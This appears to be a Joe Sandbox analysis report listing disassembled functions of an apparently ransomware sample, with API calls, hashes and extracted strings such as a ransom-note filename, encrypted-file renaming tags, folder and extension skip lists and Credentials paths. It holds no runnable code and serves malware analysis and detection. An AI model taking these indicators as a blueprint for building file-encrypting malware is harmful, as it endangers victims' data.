                                                                                                        Function 00B4061F Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: e8e25b1a4a499fa9f27b732a0f05a36be17529d4bac13837c30e757c8c426e00
                                                                                                        • Instruction ID: 9725d1ec94308ea39f19865fece88e4937cb8276ee25205b811087408d5695fa
                                                                                                        • Opcode Fuzzy Hash: e8e25b1a4a499fa9f27b732a0f05a36be17529d4bac13837c30e757c8c426e00
                                                                                                        • Instruction Fuzzy Hash: 54F05433520119BBDF11AE95DC01DDF3BADEF89330F110195FA1492150D736DA31A7A5
                                                                                                        Function 00B35B37 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B35B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?,?), ref: 00B35BC6
                                                                                                        • _free.LIBCMT ref: 00B35B57
                                                                                                          • Part of subcall function 00B34D66: RtlFreeHeap.NTDLL(00000000,00000000,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?), ref: 00B34D7C
                                                                                                          • Part of subcall function 00B34D66: GetLastError.KERNEL32(?,?,00B3D5F8,?,00000000,?,00000000,?,00B3D89C,?,00000007,?,?,00B3DC90,?,?), ref: 00B34D8E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 314386986-0
                                                                                                        • Opcode ID: 2596e58a405a887a06babddb9629c89462088039505402e28e98810da98d626b
                                                                                                        • Instruction ID: 6264a65cf8eae755416f80a6058533410275bc0ea528be1d90c4d3f6764795f9
                                                                                                        • Opcode Fuzzy Hash: 2596e58a405a887a06babddb9629c89462088039505402e28e98810da98d626b
                                                                                                        • Instruction Fuzzy Hash: 15F01DB2005B049FE3349F50D881B52B7F8EF44725F20886EE69A9BA91DB75B844CB94
                                                                                                        Function 00B35B94 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?,?,00B17B27,?,?,?,?,?,00A71F07,?,?,?), ref: 00B35BC6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 513984937a5d76bc641b94c07b591a5f52f616079b56eadaa79b59a4f79f635a
                                                                                                        • Instruction ID: 588520e18874dde5586ca46425644db7aff2f6e761e722bb520a021d758d68ac
                                                                                                        • Opcode Fuzzy Hash: 513984937a5d76bc641b94c07b591a5f52f616079b56eadaa79b59a4f79f635a
                                                                                                        • Instruction Fuzzy Hash: C5E0ED21205A64AAE6312F2AAD00F5AFAC8DF413B0F3541E0AC95A22C0FF60CC0081E0
                                                                                                        Function 00B0089A Relevance: 1.5, APIs: 1, Instructions: 29COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B01B69
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID:
                                                                                                        • API String ID: 2005118841-0
                                                                                                        • Opcode ID: 06266d970046e3b899367caeae2262f0aa3bfd14979cf9e8f1059791e0e974ad
                                                                                                        • Instruction ID: 1486c12ef3b12990e00d17aaf01fed6f83672c0ab756e9697721e9494ec74850
                                                                                                        • Opcode Fuzzy Hash: 06266d970046e3b899367caeae2262f0aa3bfd14979cf9e8f1059791e0e974ad
                                                                                                        • Instruction Fuzzy Hash: A0E09B3540430DB6CB047A78EC15A9D3FECAA00354F5085F0B924954F2EF70D555D5D1
                                                                                                        Function 00A858E0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnumWindows.USER32(00A852E0,?), ref: 00A85900
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnumWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 1129996299-0
                                                                                                        • Opcode ID: 8b59045422018209c59f6812d09bf62c6a46903a6a8ec9d5144c9e4c4caa6caa
                                                                                                        • Instruction ID: 3faf6058622249e50f2a9c111552b13e845a436392bbf9a74e09d2dc49746448
                                                                                                        • Opcode Fuzzy Hash: 8b59045422018209c59f6812d09bf62c6a46903a6a8ec9d5144c9e4c4caa6caa
                                                                                                        • Instruction Fuzzy Hash: 89E0EC30A1020CABD700EFA5DD857AEBBF8AB04601F5005A9D806A7241EE706A198B95
                                                                                                        Function 00B4035E Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,00000000,?,00B40739,?,?,00000000,?,00B40739,00000000,0000000C), ref: 00B4037B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 97ecb64d8f8fac5e0325f9921a5a2442b79d94d3aa44d21dd299655e25ffccd2
                                                                                                        • Instruction ID: fc2842ff013ee1ad261b82c2256221c3fb8a1b75909f8849569f96cef9086d49
                                                                                                        • Opcode Fuzzy Hash: 97ecb64d8f8fac5e0325f9921a5a2442b79d94d3aa44d21dd299655e25ffccd2
                                                                                                        • Instruction Fuzzy Hash: 6BD06C3210024DFFDF028F84DC06EDA3BAAFB48754F018040BA1896160C732E921AB90

                                                                                                        Non-executed Functions

                                                                                                        Function 00A7DAB0 Relevance: 64.7, APIs: 28, Strings: 8, Instructions: 1698fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B259C6: MoveFileExW.KERNEL32(?,?,00000002), ref: 00B259D3
                                                                                                          • Part of subcall function 00B259C6: GetLastError.KERNEL32 ref: 00B259DD
                                                                                                          • Part of subcall function 00B259C6: __dosmaperr.LIBCMT ref: 00B259E4
                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,08000000,00000000,?,?,?,?,?), ref: 00A7DBE6
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 00A7DC5C
                                                                                                        • SetFilePointerEx.KERNEL32(?,000000FA,000000FF,00000000,00000002,$f1;,00B6C080,00000000), ref: 00A7E106
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000006,?,00000000), ref: 00A7E12A
                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00A7E25B
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 00A7E2E8
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00A7E304
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7E4A4
                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7E4CD
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000002,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7E6FE
                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7E71A
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00B6820F,00000000,00B6820F,00000000), ref: 00A7E7F1
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,?,00000000), ref: 00A7E87A
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001,?,00B6820F), ref: 00A7EAD9
                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001,?,00B6820F,00000000), ref: 00A7EB02
                                                                                                        • SetFilePointerEx.KERNEL32(?,000000EA,000000FF,00000000,00000002,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7ED49
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000016,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7ED6D
                                                                                                        • SetFilePointerEx.KERNEL32(?,-00000016,?,00000000,00000002), ref: 00A7EDA9
                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,00000002), ref: 00A7EDC5
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00B6820F,00000000,00B6820F,00000000,00B6820F,00000000), ref: 00A7EF8A
                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,00000000), ref: 00A7F022
                                                                                                        • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7F26A
                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7F28E
                                                                                                        • SetFilePointerEx.KERNEL32(?,000000EA,000000FF,00000000,00000002,00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A7F3CC
                                                                                                        • ReadFile.KERNEL32(?,00000000,00000016,?,00000000,00000016,00000000,00B6820F), ref: 00A7F402
                                                                                                        • SetFilePointerEx.KERNEL32(?,00000016,?,00000000,00000002,Fs1z3,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00A7F42D
                                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,00000000,00000002,Fs1z3,00000000), ref: 00A7F442
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00A7F463
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Pointer$Write$Read$CloseCreateErrorHandleLastMoveSize__dosmaperr
                                                                                                        • String ID: $f1;$&4r*3d$Fs1z3$P7A1s$_Eg$jgdg$jgdg$sxuo
                                                                                                        • API String ID: 4290145678-3488327756
                                                                                                        • Opcode ID: 45d50d72caff112712b634c9fd4b0f38b42aada6adf2ae5ae2d361d17d8f28d9
                                                                                                        • Instruction ID: 0680f54b344f5b58227632f05681f77ddadb3a8c945220dada2be0ba17380f2b
                                                                                                        • Opcode Fuzzy Hash: 45d50d72caff112712b634c9fd4b0f38b42aada6adf2ae5ae2d361d17d8f28d9
                                                                                                        • Instruction Fuzzy Hash: 47F29B70D002589BEB25DF64CD45BEDBBB9AF19304F1482D8E419AB292EB706BC4CF51
                                                                                                        Function 00A89ABA Relevance: 48.6, APIs: 7, Strings: 20, Instructions: 1318filestringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrcmpW.KERNEL32(?,00B6FF18), ref: 00A89E1B
                                                                                                        • lstrcmpW.KERNEL32(?,00B6FF1C), ref: 00A89E31
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A8A10E
                                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 00A8A166
                                                                                                        • FindClose.KERNEL32(?), ref: 00A8A175
                                                                                                        • SetErrorMode.KERNEL32(00008003,AE695AF0), ref: 00A8AF9D
                                                                                                        • FindFirstFileW.KERNEL32(?,?,00B6FBE0,00000002), ref: 00A8AFC5
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A7376D
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A737B2
                                                                                                          • Part of subcall function 00A7AD10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A7ADEE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$Exception@8FileIos_base_dtorThrowlstrcmpstd::ios_base::_$CloseErrorFirstModeNext
                                                                                                        • String ID: .K0H$.bat$.cmd$.cpl$.dll$.exe$.icl$.ico$.ini$.lnk$.log$.msi$.scr$0$5$\Restore_Your_Files.txt$_Eg$_Enc$_Mail-$_[ID-
                                                                                                        • API String ID: 420669261-666215559
                                                                                                        • Opcode ID: c58bb66fc5a8c34373e69069999e284d93b3ba060fb018af7f4b4c88bf8131ca
                                                                                                        • Instruction ID: 1080507e444821e95a745b5de2cef15228ebd3bef9d7b9b230cdea735bc8ecd4
                                                                                                        • Opcode Fuzzy Hash: c58bb66fc5a8c34373e69069999e284d93b3ba060fb018af7f4b4c88bf8131ca
                                                                                                        • Instruction Fuzzy Hash: 63C29C71E006198EEF24EF24CD85BEEB7B1AF54305F5082E9E519A7290DB34AE85CF41
                                                                                                        Function 00A88240 Relevance: 32.2, APIs: 2, Strings: 16, Instructions: 684COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: \Application Data\Microsoft\Credentials$\Boot$\Documents and Settings\$\Documents and Settings\All Users\Start Menu$\Local Settings\Application Data\Microsoft\Credentials$\Local Settings\Temporary Internet Files$\ProgramData$\ProgramData\Microsoft$\Recovery$\Start Menu$\System Volume Information$\Users\All Users\Microsoft\Windows\Caches$\WINDOWS$\Windows$\skips.txt$user
                                                                                                        • API String ID: 0-188129770
                                                                                                        • Opcode ID: 4e2391f12565bb7b2f871811c9ff6774485d5ff515a3bba5e9dfbecda8b5520c
                                                                                                        • Instruction ID: 65644304399bd3b64f12e8f8f6f716e998f8a4a82211d92cdd18d47f4e4cf589
                                                                                                        • Opcode Fuzzy Hash: 4e2391f12565bb7b2f871811c9ff6774485d5ff515a3bba5e9dfbecda8b5520c
                                                                                                        • Instruction Fuzzy Hash: 67622270E00619CFDF14DF68D955BEEB7B1FB58305F5082A9D418A7290EB74AA88CF90
                                                                                                        Function 00A86AF7 Relevance: 25.6, APIs: 1, Strings: 13, Instructions: 1091COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A7376D
                                                                                                          • Part of subcall function 00A73740: __CxxThrowException@8.LIBVCRUNTIME ref: 00A737B2
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A8816A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw$Ios_base_dtorstd::ios_base::_
                                                                                                        • String ID: &4r*3d$($.K0H$21L0I$_Mail-$_[ID-$vj10au=$vj20au=$vj30au=$vj51au=$vj55au=$vjau=$wenf=
                                                                                                        • API String ID: 2823994529-3162937380
                                                                                                        • Opcode ID: 6b1263c7520ec77c0e7e3b771f9e05656c0fab6d9baf57314034581971f3eae2
                                                                                                        • Instruction ID: 80ae83f7aa1a2831ed83d160c1eae5ac7c5b14b5a7ef046ee88f6f788b26ea22
                                                                                                        • Opcode Fuzzy Hash: 6b1263c7520ec77c0e7e3b771f9e05656c0fab6d9baf57314034581971f3eae2
                                                                                                        • Instruction Fuzzy Hash: 04A2E131A14259CBDB24EF28CD59BDDBBB1EF55304F2082D8D049AB2A1DB75AAC4CF50
                                                                                                        Function 00A85AC0 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 250libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,GetLogicalProcessorInformation,?), ref: 00A85AFA
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00A85B01
                                                                                                        • GetLastError.KERNEL32 ref: 00A85B3F
                                                                                                        Strings
                                                                                                        • Error: Allocation failure, xrefs: 00A85B6D
                                                                                                        • Error %d, xrefs: 00A85B8E
                                                                                                        • GetLogicalProcessorInformation is not supported., xrefs: 00A85B0F
                                                                                                        • kernel32, xrefs: 00A85AE1
                                                                                                        • GetLogicalProcessorInformation, xrefs: 00A85ADC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                                                        • String ID: Error %d$Error: Allocation failure$GetLogicalProcessorInformation is not supported.$GetLogicalProcessorInformation$kernel32
                                                                                                        • API String ID: 4275029093-3269863577
                                                                                                        • Opcode ID: 43f712ced460163b1d7206603738d00f883adbbfb48cc2b71daa6fe2e75432a5
                                                                                                        • Instruction ID: 812927eb3bd2a276e5227a28c6645dd795fe3156518f658b6be2b46545061744
                                                                                                        • Opcode Fuzzy Hash: 43f712ced460163b1d7206603738d00f883adbbfb48cc2b71daa6fe2e75432a5
                                                                                                        • Instruction Fuzzy Hash: AE710571A14B418BD718EF38DC8562EB7E1EFC4310F444A6DF88997291EB74ED858B82
                                                                                                        Function 00B042D4 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B05963: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00B05976
                                                                                                        • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00B042E6
                                                                                                          • Part of subcall function 00B05A76: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00B05AA0
                                                                                                          • Part of subcall function 00B05A76: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00B05B0F
                                                                                                        • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00B04418
                                                                                                        • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00B04478
                                                                                                        • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00B04484
                                                                                                        • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 00B044BF
                                                                                                        • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 00B044E0
                                                                                                        • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 00B044EC
                                                                                                        • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00B044F5
                                                                                                        • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 00B0450D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
